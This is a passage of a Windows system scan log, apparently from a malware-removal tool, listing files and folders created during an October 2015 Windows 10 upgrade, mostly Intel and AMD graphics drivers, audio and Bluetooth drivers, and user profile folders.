2015-10-11 02:11 - 2015-10-11 02:11 - 00135680 _____ (Intel Corporation) C:\WINDOWS\system32\igfxcpl.cpl
2015-10-11 02:11 - 2015-10-11 02:11 - 00124928 _____ (Intel Corporation) C:\WINDOWS\system32\igfxCoIn_v4229.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00072704 _____ (Intel Corporation) C:\WINDOWS\system32\igfxsrvc.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00059425 _____ C:\WINDOWS\system32\iglhxo64.vp
2015-10-11 02:11 - 2015-10-11 02:11 - 00059398 _____ C:\WINDOWS\system32\iglhxg64.vp
2015-10-11 02:11 - 2015-10-11 02:11 - 00059230 _____ C:\WINDOWS\system32\iglhxc64.vp
2015-10-11 02:11 - 2015-10-11 02:11 - 00059104 _____ C:\WINDOWS\system32\iglhxc64_dev.vp
2015-10-11 02:11 - 2015-10-11 02:11 - 00058796 _____ C:\WINDOWS\system32\iglhxg64_dev.vp
2015-10-11 02:11 - 2015-10-11 02:11 - 00058109 _____ C:\WINDOWS\system32\iglhxo64_dev.vp
2015-10-11 02:11 - 2015-10-11 02:11 - 00041288 _____ (Intel Corporation) C:\WINDOWS\system32\igfxexps.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00033792 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igfxexps32.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00018432 _____ ( ) C:\WINDOWS\system32\IGFXDEVLib.dll
2015-10-11 02:11 - 2015-10-11 02:11 - 00017082 _____ C:\WINDOWS\system32\iglhxs64.vp
2015-10-11 02:11 - 2015-10-11 02:11 - 00001074 _____ C:\WINDOWS\system32\iglhxa64.vp
2015-10-11 02:10 - 2015-10-11 02:10 - 13059896 _____ (Intel Corporation) C:\WINDOWS\system32\igd10umd64.dll
2015-10-11 02:10 - 2015-10-11 02:10 - 13037568 _____ (Intel Corporation) C:\WINDOWS\system32\ig4icd64.dll
2015-10-11 02:10 - 2015-10-11 02:10 - 11352688 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igd10umd32.dll
2015-10-11 02:10 - 2015-10-11 02:10 - 10820096 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\ig4icd32.dll
2015-10-11 02:10 - 2015-10-11 02:10 - 05916080 _____ (Intel Corporation) C:\WINDOWS\system32\GfxUI.exe
2015-10-11 02:10 - 2015-10-11 02:10 - 00963452 _____ C:\WINDOWS\SysWOW64\igcodeckrng600.bin
2015-10-11 02:10 - 2015-10-11 02:10 - 00963452 _____ C:\WINDOWS\system32\igcodeckrng600.bin
2015-10-11 02:10 - 2015-10-11 02:10 - 00411056 _____ (Intel Corporation) C:\WINDOWS\system32\hkcmd.exe
2015-10-11 02:10 - 2015-10-11 02:10 - 00223664 _____ C:\WINDOWS\system32\Gfxres.th-TH.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00210106 _____ C:\WINDOWS\system32\Gfxres.el-GR.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00197040 _____ (Intel Corporation) C:\WINDOWS\system32\difx64.exe
2015-10-11 02:10 - 2015-10-11 02:10 - 00194245 _____ C:\WINDOWS\system32\Gfxres.ru-RU.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00183808 _____ (Intel Corporation) C:\WINDOWS\system32\gfxSrvc.dll
2015-10-11 02:10 - 2015-10-11 02:10 - 00166170 _____ C:\WINDOWS\system32\Gfxres.ar-SA.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00163421 _____ C:\WINDOWS\system32\Gfxres.ja-JP.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00159008 _____ C:\WINDOWS\system32\Gfxres.he-IL.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00149682 _____ C:\WINDOWS\system32\Gfxres.it-IT.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00148042 _____ C:\WINDOWS\system32\Gfxres.ko-KR.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00147393 _____ C:\WINDOWS\system32\Gfxres.de-DE.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00147288 _____ C:\WINDOWS\system32\Gfxres.es-ES.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00146004 _____ C:\WINDOWS\system32\Gfxres.ro-RO.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00145491 _____ C:\WINDOWS\system32\Gfxres.fr-FR.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00144645 _____ C:\WINDOWS\system32\Gfxres.tr-TR.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00144260 _____ C:\WINDOWS\system32\Gfxres.pt-BR.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00144020 _____ C:\WINDOWS\system32\Gfxres.nl-NL.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00143932 _____ C:\WINDOWS\system32\Gfxres.hu-HU.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00142882 _____ C:\WINDOWS\system32\Gfxres.sv-SE.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00142877 _____ C:\WINDOWS\system32\Gfxres.pt-PT.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00142717 _____ C:\WINDOWS\system32\Gfxres.pl-PL.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00142289 _____ C:\WINDOWS\system32\Gfxres.cs-CZ.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00142008 _____ C:\WINDOWS\system32\Gfxres.fi-FI.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00141838 _____ C:\WINDOWS\system32\Gfxres.sk-SK.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00141049 _____ C:\WINDOWS\system32\Gfxres.hr-HR.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00137889 _____ C:\WINDOWS\system32\Gfxres.sl-SI.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00137784 _____ C:\WINDOWS\system32\Gfxres.nb-NO.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00137141 _____ C:\WINDOWS\system32\Gfxres.da-DK.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00132623 _____ C:\WINDOWS\system32\Gfxres.en-US.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00126300 _____ C:\WINDOWS\system32\Gfxres.zh-TW.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00124650 _____ C:\WINDOWS\system32\Gfxres.zh-CN.resources
2015-10-11 02:10 - 2015-10-11 02:10 - 00119296 _____ (Intel Corporation) C:\WINDOWS\system32\hccutils.dll
2015-10-11 02:10 - 2015-10-11 02:10 - 00110080 _____ C:\WINDOWS\system32\igdde64.dll
2015-10-11 02:10 - 2015-10-11 02:10 - 00102912 _____ C:\WINDOWS\system32\IccLibDll_x64.dll
2015-10-11 02:10 - 2015-10-11 02:10 - 00090112 _____ C:\WINDOWS\SysWOW64\igdde32.dll
2015-10-11 02:07 - 2015-10-11 02:07 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2015-10-11 02:07 - 2015-10-11 02:07 - 00000000 ____D C:\Program Files\AMD
2015-10-11 02:07 - 2015-10-11 02:07 - 00000000 ____D C:\AMD
2015-10-11 02:05 - 2015-10-11 02:05 - 47795680 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 39723504 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 30760944 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atio6axx.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 27544560 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl12cl64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 25308656 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atioglxx.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 22328800 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl12cl.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 21632992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmdag.sys
2015-10-11 02:05 - 2015-10-11 02:05 - 15727072 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticaldd64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 14312416 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticaldd.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 12062040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atidxx64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 10191264 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atidxx32.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 09191312 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 08979760 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd6a.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 08865496 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 08009344 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdva.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 07575664 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 07482560 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdag.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 06486000 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmantle64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 05076976 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmantle32.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2015-10-11 02:05 - 2015-10-11 02:05 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2015-10-11 02:05 - 2015-10-11 02:05 - 01468224 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 01257952 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 01213192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 01196032 _____ C:\WINDOWS\system32\amdocl_as64.exe
2015-10-11 02:05 - 2015-10-11 02:05 - 01070592 _____ C:\WINDOWS\system32\amdocl_ld64.exe
2015-10-11 02:05 - 2015-10-11 02:05 - 01005552 _____ C:\WINDOWS\SysWOW64\amdocl_as32.exe
2015-10-11 02:05 - 2015-10-11 02:05 - 00936928 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00936928 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00874480 _____ (AMD) C:\WINDOWS\system32\coinst_15.20.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00833798 _____ C:\WINDOWS\system32\amdicdxx.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00807424 _____ C:\WINDOWS\SysWOW64\amdocl_ld32.exe
2015-10-11 02:05 - 2015-10-11 02:05 - 00737410 _____ C:\WINDOWS\system32\atiicdxx.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00681456 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2015-10-11 02:05 - 2015-10-11 02:05 - 00675296 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmpag.sys
2015-10-11 02:05 - 2015-10-11 02:05 - 00660928 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2015-10-11 02:05 - 2015-10-11 02:05 - 00660928 _____ C:\WINDOWS\system32\atiapfxx.blb
2015-10-11 02:05 - 2015-10-11 02:05 - 00472832 _____ C:\WINDOWS\system32\amdmiracast.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00452576 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00377312 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2015-10-11 02:05 - 2015-10-11 02:05 - 00341488 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ATIODE.exe
2015-10-11 02:05 - 2015-10-11 02:05 - 00322868 _____ C:\WINDOWS\system32\ativvaxy_vi.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00321200 _____ C:\WINDOWS\system32\ativvaxy_vi_nd.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00256992 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2015-10-11 02:05 - 2015-10-11 02:05 - 00255808 _____ C:\WINDOWS\system32\ativvaxy_cz_nd.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00250884 _____ C:\WINDOWS\system32\ativvaxy_FJ.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00249088 _____ C:\WINDOWS\system32\ativvaxy_FJ_nd.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00243696 _____ C:\WINDOWS\system32\clinfo.exe
2015-10-11 02:05 - 2015-10-11 02:05 - 00234420 _____ C:\WINDOWS\system32\ativvaxy_cik.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00232752 _____ C:\WINDOWS\system32\ativvaxy_cik_nd.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00213488 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00204952 _____ C:\WINDOWS\SysWOW64\ativvsvl.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00204952 _____ C:\WINDOWS\system32\ativvsvl.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00201184 _____ (AMD) C:\WINDOWS\system32\atitmm64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00198640 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00170464 _____ C:\WINDOWS\system32\atieah64.exe
2015-10-11 02:05 - 2015-10-11 02:05 - 00169152 _____ C:\WINDOWS\system32\ativce03.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00167456 _____ C:\WINDOWS\system32\amde31a.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00165360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00162240 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiuxp64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00157144 _____ C:\WINDOWS\SysWOW64\ativvsva.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00157144 _____ C:\WINDOWS\system32\ativvsva.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00152560 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2015-10-11 02:05 - 2015-10-11 02:05 - 00152032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00143344 _____ C:\WINDOWS\system32\amdhdl64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00143048 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiuxpag.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00136176 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00132080 _____ C:\WINDOWS\SysWOW64\amdhdl32.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00131592 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiu9p64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00122352 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00113880 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiu9pag.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00111600 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00111088 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00102384 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00100816 _____ C:\WINDOWS\system32\ativce02.dat
2015-10-11 02:05 - 2015-10-11 02:05 - 00095216 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00089520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00088000 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00085472 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6pxx.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00082680 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00081160 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00078320 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiglpxx.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00078320 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiglpxx.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00073712 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00071152 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalrt64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00069600 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00064496 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalcl64.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00062432 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalrt.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00061408 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ATIODCLI.exe
2015-10-11 02:05 - 2015-10-11 02:05 - 00059376 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmmcl6.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00059360 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalcl.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00052208 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\ati2erec.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00049632 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmmcl.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00039904 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00012784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2015-10-11 02:05 - 2015-10-11 02:05 - 00012784 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2015-10-11 02:02 - 2015-10-11 02:02 - 01721216 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01009.dll
2015-10-11 02:02 - 2015-10-11 02:02 - 01390904 _____ (Motorola Solutions, Inc.) C:\WINDOWS\system32\Drivers\btmhsf.sys
2015-10-11 02:02 - 2015-10-11 02:02 - 00080184 _____ (Motorola Solutions, Inc.) C:\WINDOWS\system32\btmwu.dll
2015-10-11 02:02 - 2015-10-11 02:02 - 00069088 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iBtFltCoex.sys
2015-10-11 02:02 - 2015-10-11 02:02 - 00000000 ____D C:\iBTWU
2015-10-11 01:59 - 2015-10-11 01:59 - 00000000 ____D C:\Users\christopher lane\AppData\Local\Publishers
2015-10-11 01:58 - 2015-10-13 14:11 - 00000000 ____D C:\Users\christopher lane\AppData\Local\Packages
2015-10-11 01:58 - 2015-10-11 01:58 - 00000020 ___SH C:\Users\christopher lane\ntuser.ini
2015-10-11 01:58 - 2015-10-11 01:58 - 00000000 ____D C:\Users\christopher lane\AppData\Local\TileDataLayer
2015-10-11 01:55 - 2015-10-11 01:55 - 00000020 ___SH C:\Users\DefaultAppPool\ntuser.ini
2015-10-11 01:55 - 2015-10-11 01:55 - 00000000 ____D C:\Users\DefaultAppPool
2015-10-11 01:55 - 2015-10-11 01:44 - 00000000 ___RD C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-10-11 01:55 - 2015-10-11 01:44 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\TuneUp Software
2015-10-11 01:55 - 2015-10-11 01:44 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Macromedia
2015-10-11 01:55 - 2015-07-30 15:42 - 00000000 __RSD C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell
2015-10-11 01:55 - 2015-07-30 15:42 - 00000000 ___RD C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-10-11 01:55 - 2015-07-30 15:42 - 00000000 ___RD C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2015-10-11 01:55 - 2015-07-30 15:42 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-10-11 01:53 - 2015-10-11 01:53 - 00022744 _____ C:\WINDOWS\system32\emptyregdb.dat
2015-10-11 01:44 - 2015-10-11 01:44 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-10-11 01:44 - 2015-10-11 01:44 - 00000000 ____D C:\Users\Default\AppData\Roaming\TuneUp Software
2015-10-11 01:44 - 2015-10-11 01:44 - 00000000 ____D C:\Users\Default\AppData\Roaming\Macromedia
2015-10-11 01:44 - 2015-10-11 01:44 - 00000000 ____D C:\Users\Default User\AppData\Roaming\TuneUp Software
2015-10-11 01:44 - 2015-10-11 01:44 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Macromedia
2015-10-11 01:37 - 2015-10-11 01:37 - 00000000 ____D C:\Program Files\Common Files\SpeechEngines
2015-10-11 01:34 - 2015-10-14 21:25 - 00000000 ____D C:\Users\christopher lane
2015-10-11 01:34 - 2015-10-11 01:58 - 00000000 ___RD C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-10-11 01:34 - 2015-07-30 15:42 - 00000000 __RSD C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell
2015-10-11 01:34 - 2015-07-30 15:42 - 00000000 ___RD C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-10-11 01:34 - 2015-07-30 15:42 - 00000000 ___RD C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2015-10-11 01:34 - 2015-07-30 15:42 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-10-11 01:33 - 2015-10-11 01:50 - 00000000 ____D C:\Users\Guest
2015-10-11 01:33 - 2015-10-11 01:34 - 00000000 ___RD C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-10-11 01:33 - 2015-07-30 15:42 - 00000000 __RSD C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell
2015-10-11 01:33 - 2015-07-30 15:42 - 00000000 ___RD C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-10-11 01:33 - 2015-07-30 15:42 - 00000000 ___RD C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2015-10-11 01:33 - 2015-07-30 15:42 - 00000000 ____D C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-10-11 01:32 - 2015-10-16 20:51 - 01006528 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-10-11 01:32 - 2015-10-11 01:33 - 00021209 _____ C:\WINDOWS\iis.log
2015-10-11 01:32 - 2015-10-11 01:32 - 00961296 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2015-10-11 01:30 - 2015-10-11 01:37 - 00000000 ____D C:\Program Files\IDT
2015-10-11 01:30 - 2015-10-11 01:30 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01009.Wdf
2015-10-11 01:30 - 2015-10-11 01:30 - 00000000 ____D C:\WINDOWS\system32\SRSLabs
2015-10-11 01:30 - 2015-10-11 01:30 - 00000000 ____D C:\Program Files\Synaptics
2015-10-11 01:30 - 2011-03-17 04:14 - 06351872 _____ (IDT, Inc.) C:\WINDOWS\system32\IDTNGUI.exe
2015-10-11 01:30 - 2011-03-17 04:14 - 04642816 _____ (IDT, Inc.) C:\WINDOWS\system32\stlang64.dll
2015-10-11 01:30 - 2011-03-17 04:14 - 03293184 _____ (IDT, Inc.) C:\WINDOWS\system32\IDTNHP.dll
2015-10-11 01:30 - 2011-03-17 04:14 - 01523712 _____ (IDT, Inc.) C:\WINDOWS\system32\IDTNC64.cpl
2015-10-11 01:30 - 2011-03-17 04:14 - 01128448 _____ (IDT, Inc.) C:\WINDOWS\sttray64.exe
2015-10-11 01:30 - 2011-03-17 04:14 - 01020416 _____ (IDT, Inc.) C:\WINDOWS\system32\IDTNX.dll
2015-10-11 01:30 - 2011-03-17 04:14 - 00221184 _____ (IDT, Inc.) C:\WINDOWS\system32\HPToneCtrls64.dll
2015-10-11 01:30 - 2011-03-17 04:14 - 00212480 _____ (IDT, Inc.) C:\WINDOWS\system32\IDTNJ.exe
2015-10-11 01:30 - 2010-04-01 15:11 - 00162304 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AESTAC64.dll
2015-10-11 01:30 - 2009-10-10 01:45 - 00442368 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AESTEC64.dll
2015-10-11 01:30 - 2009-03-03 02:58 - 00068608 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AESTAR64.dll
2015-10-11 01:30 - 2009-03-03 02:47 - 00090624 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AESTCo64.dll
2015-10-11 01:28 - 2015-10-11 01:29 - 00036751 _____ C:\WINDOWS\system32\NetSetupMig.log
2015-10-11 01:00 - 2015-10-11 01:54 - 00006588 _____ C:\WINDOWS\comsetup.log
2015-10-11 00:32 - 2015-10-14 19:47 - 00000000 ___HD C:\$Windows.~BT
2015-10-11 00:12 - 2015-10-11 00:12 - 19733696 _____ (Microsoft Corporation) C:\Users\christopher lane\Downloads\MediaCreationToolx64 (1).exe
2015-10-11 00:12 - 2015-10-11 00:12 - 00000000 ___HD C:\$Windows.~WS
2015-10-11 00:00 - 2015-10-11 01:54 - 00014263 _____ C:\WINDOWS\diagerr.xml
2015-10-11 00:00 - 2015-10-11 01:54 - 00013338 _____ C:\WINDOWS\diagwrn.xml
2015-10-10 23:52 - 2015-10-11 00:26 - 00000000 ____D C:\ESD
2015-10-10 23:38 - 2015-10-10 23:38 - 19733696 _____ (Microsoft Corporation) C:\Users\christopher lane\Downloads\MediaCreationToolx64.exe
2015-10-10 23:32 - 2015-10-10 23:32 - 00026288 _____ C:\Users\christopher lane\Desktop\GWXWebWindows.exe
2015-10-10 23:31 - 2015-10-10 23:31 - 00026288 _____ C:\Users\christopher lane\Downloads\GWXWebWindows.exe
2015-10-08 21:56 - 2015-10-16 20:52 - 00000000 ____D C:\Users\christopher lane\AppData\LocalLow\Seven Sails Ltda
2015-10-08 21:50 - 2015-10-08 21:50 - 00001940 _____ C:\Users\Public\Desktop\Play Country Tales.lnk
2015-10-08 21:50 - 2015-10-08 21:50 - 00001256 _____ C:\Users\Public\Desktop\More Great Games.lnk
2015-10-08 21:49 - 2015-10-11 01:46 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Country Tales
2015-10-08 21:49 - 2015-10-11 01:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Country Tales
2015-10-08 21:49 - 2015-10-08 21:50 - 00000000 ____D C:\Program Files (x86)\Country Tales
2015-10-08 21:48 - 2015-10-08 21:48 - 00002177 _____ C:\Users\Public\Desktop\Play Monument Builders - Golden Gate Bridge.lnk
